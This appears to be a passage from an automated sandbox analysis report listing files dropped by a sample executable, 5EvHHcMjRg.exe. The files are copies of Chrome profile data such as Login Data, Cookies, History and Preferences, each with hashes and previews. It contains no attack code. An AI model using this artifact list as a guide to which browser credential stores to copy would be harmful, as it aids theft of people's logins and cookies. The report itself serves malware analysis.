MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\LOG

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	283
Entropy (8bit):	5.206015644964145
Encrypted:	false
SSDEEP:	6:k9j1wkn23iKKdK86FB2KLliGq2Pwkn23iKKdK865IFUv:k9Sf5Kk/FFLkGvYf5Kk/WFUv
MD5:	9A3DC0BD8E972A08DDDCBBEC628744BD
SHA1:	B0BE51029C40F0E1C534FC9549D08898690E6523
SHA-256:	FAB53A06A7084EFD22ADC9011D64687C8F6DF8B52F8574AA1AE3F468463E2B76
SHA-512:	F4341713E864890D11B9422C9894ED88FC6C5A22D9535B74DDFDDDF46BF0F5E78256844AFE7FCA881E2F768AA7A9EA803E20708294FA2703A4643A3E490519DF
Malicious:	false
Preview:	2023/10/03-12:49:58.333 1370 Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts since it was missing..2023/10/03-12:49:58.418 1370 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts/MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\MANIFEST-000001

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\CURRENT

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\LOG

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	327
Entropy (8bit):	5.202341686847106
Encrypted:	false
SSDEEP:	6:kQLTqt+q2Pwkn23iKKdKWT5g1IdqIFUt1LRNJZmwPLRN9VkwOwkn23iKKdKWT5gZ:kQLTqovYf5Kkg5gSRFUt1LRNJ/PLRNDH
MD5:	BB63C2BC9A88E8910F356B13EF211377
SHA1:	68F6361DDE01181039EBD4E71022E2B8E8EE9BDA
SHA-256:	E9534FB166A331341564279D6C0F58846FB70904F78E96148786F71EE989F059
SHA-512:	4A6D30ABD29D3AE4C708E77EAE7D32C29FD6AB21AC27190CE568CC695EB32D750BDAE3FF65FC1C7003CDAC43E25A492F009DF393787523D2321004D9F3E8D7EC
Malicious:	false
Preview:	2023/10/04-10:56:03.161 6a8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2023/10/04-10:56:03.162 6a8 Recovering log #3.2023/10/04-10:56:03.162 6a8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\LOG.old

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.174764681224397
Encrypted:	false
SSDEEP:	6:kQ2tc54q2Pwkn23iKKdKWT5g1IdqIFUt12td7JZmwP2td7DkwOwkn23iKKdKWT5i:kQscavYf5Kkg5gSRFUt1sj/Ps55Jf5Kg
MD5:	8555B27ED470F962B5C279B68110B456
SHA1:	291BC36D887E83D0CFB8785C797F275BB7BFB37C
SHA-256:	A6C7DD01DC59F9B31145F6FE9EC857D04DE2F910F101FB96B330470ED69B7A69
SHA-512:	AF4E2BF9CDF6026BE58DA6AE5897D69CC6FBF5F92B533B99AE0040604C6BD9BB9F62E3B969F6B821A227362A3149EC5D4E80EC5686257FA05BBF15E5922AA09D
Malicious:	false
Preview:	2023/10/04-10:54:44.448 1084 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2023/10/04-10:54:44.449 1084 Recovering log #3.2023/10/04-10:54:44.449 1084 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\MANIFEST-000001

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Google Profile.ico

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
Category:	dropped
Size (bytes):	197794
Entropy (8bit):	6.548294817785579
Encrypted:	false
SSDEEP:	3072:HXm/EXUfaL6MV8nbsFXdFVgQAU6v4v62PV2Ey28nr6dOQriQWe4g2rJBXCy9enoN:HXUMCm4U6q62MEBi99g6JVCvoZhhl+No
MD5:	EF36A84AD2BC23F79D171C604B56DE29
SHA1:	38D6569CD30D096140E752DB5D98D53CF304A8FC
SHA-256:	E9EECF02F444877E789D64C2290D6922BD42E2F2FE9C91A1381959ACD3292831
SHA-512:	DBB28281F8FA86D9084A0C3B3CDB6007C68AA038D8C28FE9B69AC0C1BE6DC2141CA1B2D6A444821E25ACE8E92FB35C37C89F8BCE5FEE33D6937E48B2759FA8BE
Malicious:	false
Preview:	............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ......M..(............. .............................7...C.%.?...................@..,D.$.<...I.-.>.\............-H.(.B.....f....q.g...........H.".N.G....r...p....%.......N...>q.....}...s....-...$...H.k.(:..pv......r...'...1...''..1?..)9..5I..5P..(F..0F..)F.,....->.-7D.1=..1;..5>.,,......................................(............. .................................>..[A.".C..............W............?...F.$.>...5....9.................C.!TI.(.>...S.>......r.9..............XG.(.F.".V.@......S...P....-...........M.-.<.........V..q...p....F........."...R.#.6~M.......I..o#..q$...G.........)...Q.,.4W..;F.......N...L.....>......-...:e.X4B..'5..@Q..........@...)...3......T....0;.5D...;..!0..!/..-1..36..,$..............2>.W6D..7D..7D..4E..0F.[..........................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\History

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	data
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.171537776671825
Encrypted:	false
SSDEEP:	6:eM/45dclWwBLIMZh4BLIMZjF9NkFU83RXILElWwBLIMZh4BLIMZjF9NkFUaURXI1:C5dclWw9TO9TjF9NkuUplWw9TO9TjF9e
MD5:	FCCA94B9EF13FA4481311C0655B36FEC
SHA1:	89F69CC960DBE54A8B0F81B1808F448308D38E03
SHA-256:	B9B71B0D72805451341FDB87AF64407F896F9C228611037EAE099D4381073E01
SHA-512:	6EF930403828E11E14DF5A1D5F2C9B4D5756BC16CB9E8FF8B35EACF9F11FF1201B197EA66772D9AF48C1014B4F2ED283B7712E99DF90F658E6EDC1ED3DCA0C36
Malicious:	false
Preview:	a.a..................VERSION.1."META:https://support.microsoft.com.W_https://support.microsoft.com..Wed Oct 04 2023 10:53:55 GMT+0100 (British Summer Time).,.................."META:https://support.microsoft.com.W_https://support.microsoft.com..Wed Oct 04 2023 10:54:39 GMT+0100 (British Summer Time)

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Local Storage\leveldb\CURRENT

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.165673604690275
Encrypted:	false
SSDEEP:	6:k+VhpN+q2Pwkn23iKKdK8a2jMGIFUtPVhpZZmw1Vhmr3VkwOwkn23iKKdK8a2jM4:kqfIvYf5Kk8EFUttfZ/fQF5Jf5Kk8bJ
MD5:	942CAE3FBA120A50FA51641491055B83
SHA1:	D6A873B471C9DD5110D7BB9335963FE716C98A53
SHA-256:	A977282C1720A3963EABB24025B5FEFE3C5B910A850014D5327C5E706330BB87
SHA-512:	E019056FA8106E95D768563068DBD90AE82AB0C9B51C422D723456F35408EFE9EB13F05C39C62703CDE2C5F2DE4E6E027C6D4EBBF8DD9E801FAC593446A6E547
Malicious:	false
Preview:	2023/10/04-12:01:07.673 1af8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2023/10/04-12:01:07.673 1af8 Recovering log #3.2023/10/04-12:01:07.674 1af8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Local Storage\leveldb\LOG.old

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.10866162320237
Encrypted:	false
SSDEEP:	6:k+V/Tq2Pwkn23iKKdK8a2jMGIFUtPVxVXZmw1V1yzkwOwkn23iKKdK8a2jMmLJ:kq/TvYf5Kk8EFUttTX/fIz5Jf5Kk8bJ
MD5:	ECA4B0B589FF1A24367980B91FA826B9
SHA1:	F154EF9EC559126FEABB229A80025FF0642F019E
SHA-256:	67A880F793CB35B151BCF52911C478C2B96619A722E3B0551AB80388F9224D65
SHA-512:	CBA68B9F706FC4332A5CB7248F6926C657D050294613AE9AEA8BA0A34CD5E0A2B34939F001BC4529EFEDC4498B30DE1933D23AECAF7D0F4E578A44D80CA6C36A
Malicious:	false
Preview:	2023/10/04-12:01:05.510 1a70 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2023/10/04-12:01:05.513 1a70 Recovering log #3.2023/10/04-12:01:05.516 1a70 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Local Storage\leveldb\MANIFEST-000001

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Login Data

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Login Data For Account

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network Action Predictor

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.40293591932113104
Encrypted:	false
SSDEEP:	24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
MD5:	ADC0CFB8A1A20DE2C4AB738B413CBEA4
SHA1:	238EF489E5FDC6EBB36F09D415FB353350E7097B
SHA-256:	7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
SHA-512:	38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Cookies

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Network Persistent State

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.926136109079379
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LSL:YHpoeSL
MD5:	4DF4574BFBB7E0B0BC56C2C9B12B6C47
SHA1:	81EFCBD3E3DA8221444A21F45305AF6FA4B71907
SHA-256:	E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
SHA-512:	78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Reporting and NEL

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.0646462322110462
Encrypted:	false
SSDEEP:	96:+IEumQv8m1ccnvS6tsmdsqsNXsp3sGsust:+IEumQv8m1ccnvS6ntI
MD5:	5F06E669ECBEAA24A2E878282B82E311
SHA1:	EED48C0A211ADE962B8BA5EB8211C9CFBF9077FD
SHA-256:	D12DD32D1D0B4FCAD7C69D8EF1C8B87A88BE5C67F545A15390E699B671E3DAD3
SHA-512:	5140271EDC9CC441785B1F65182048DD2351CB80079676499C74A49EA25D930221D2BEE5625E2F14A8240EDA45AC1BF6E1CF0B862453AC7DE8AAC13112609DAA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\TransportSecurity

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1861
Entropy (8bit):	5.5919560532515336
Encrypted:	false
SSDEEP:	48:YjUwUtAUVtReUl44UFUQDUfUth3UWUcbwULp:EUwUtAUVLeUl44UFUoUfUt9UWUckULp
MD5:	1BBA534A956987752571E8B35BA0A9E6
SHA1:	53FE7223C6E1F0CDCF4CEA93EE606C9C7D9575E4
SHA-256:	E6A0B9DF9FBB7D30FB79A22554DD83642DE9B7D4FAD9E68ECC2781A73A659633
SHA-512:	C1399D17A8BEAE87B0FC7A5682988191CD2845179A6B1035752653CE5136AE7A473F4BAECB0D61D2B48E44A7683E82C7C4E8C02B8A3BFEAFE3AED0E3761B5BCF
Malicious:	false
Preview:	{"sts":[{"expiry":1727949235.323521,"host":"AVsuOZgBg0wdpKMoxm8zihjqET8kI4Xl8bCSMk28RsE=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1696413235.323524},{"expiry":1727949282.424317,"host":"F8CDsiT0h6lTN4Nqwoyb2wNyqqjWSTsRj/gzlYU3NfY=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696413282.42432},{"expiry":1727949283.251429,"host":"PKqosHGXLFTwexcsjC+UXTkKV3GWWHwtzKz/ULb9ssM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1696413283.251431},{"expiry":1727949277.763839,"host":"a1ZTYlNSUSrj8xKbRz2eU2pqvpuOBdbHFtk7jbKGSQI=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696413277.763846},{"expiry":1727949281.690375,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696413281.690379},{"expiry":1696499632.238287,"host":"hO4c1Mkk0q8LAaWeHgNIC6BWaZFsSZX4dkBAZ7FIfxU=","mode":"force-https","sts_include_subdomains":true,"sts_observed":16964132

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Trust Tokens

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Preferences

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10758
Entropy (8bit):	5.281707993521017
Encrypted:	false
SSDEEP:	192:agqtJmltzddaJAAEzRQ+V+F5lnJmIWd0bUE9ftZCEXqT0ZCrO:axtErBgyzZGHnYIWd6tZpXqT0ZCC
MD5:	769546C17595717B5AF5CC7A52D018A4
SHA1:	E3911F252E85C05C98E55349A82F3245D05EBACD
SHA-256:	ADB759B96A5B431B59C009EFB24612956E0D80FFE81634BA29F6BEB1D1F37D49
SHA-512:	4F8FBBA982F763CB770FFEF38EA6D27C37A4E0A5804F4103CB828CADDA77A6B5B473D4B9E22F571D0CEEBFCCB557C2F77BF932C33FA1EC4168F3A8F5876BBC05
Malicious:	false
Preview:	{"NewTabPage":{"PrevNavigationTime":"13340886961014896"},"account_tracker_service_last_update":"13340807398438930","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13340807398295099","apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"has_seen_welcome_page":false,"should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"commerce_daily_metrics_last_update_time":"13340807423268579","countryid_at_install":17224,"default_apps_install_state":3,"dips_timer_last_update":"13340886830181789","domain_diversity":{"last_reporting_timestamp":"13340881757303313"},"download":{"directory_upgrade":true,"always_open_pdf_externally":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:do

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PreferredApps

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.051821770808046
Encrypted:	false
SSDEEP:	3:YVXADAEvTLSJ:Y9AcEvHSJ
MD5:	2B432FEF211C69C745ACA86DE4F8E4AB
SHA1:	4B92DA8D4C0188CF2409500ADCD2200444A82FCC
SHA-256:	42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
SHA-512:	948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
Malicious:	false
Preview:	{"preferred_apps":[],"version":1}

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PrivateAggregation

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.3494502770750662
Encrypted:	false
SSDEEP:	12:TLyKjXWhNOUhhQvbKL2LzKFxOUwa5qguWfpbZ75fOS:TLhjXWjD20wzK6UwccWfp15fB
MD5:	92A8445F953152A4A4CDD1477CC1A372
SHA1:	44F52B73D6BFB593F153DB7376F768AB8FEFFB53
SHA-256:	E31AB956F376013575B8FC9E06ED294E9EE0851DAA6DDF68B8407458A812DD5F
SHA-512:	17DD96B4635C4E26D0A1738B8B267176AD2911B7491082C49DAF0A1490A9D59D1E2899755CB6611D3A3CB5E4A193C08086D1FEBFB576C13D9ECD6096F22F9E68
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......d..g...d......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Secure Preferences

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	17262
Entropy (8bit):	5.5583886274599275
Encrypted:	false
SSDEEP:	384:HDOtLPLe3QXvh1kXqKf/pUZNCgVLH2HfE6DrU+FHGUHak3v:HStLPLwavh1kXqKf/pUZNCgVLH2HfPD5
MD5:	6AF58821785FC12E2BEBDF8B909F70BE
SHA1:	BC8A4E2F51E6DB6C9281AE138E48338C4A6735EF
SHA-256:	A3D41E2E58D59AE017AD885C9DABA256AF0E87FAB816CA098C0B750BA79A3F58
SHA-512:	A56E95A70340EE7E77F8B7B476ACE9CFAB19E53AEDD7CB2D6802AE887205E1B84B614DC0C6EC4FF2890A223447AE6A9D6F3AC75B8C5B9C6CFCF54A02EFCF543A
Malicious:	false
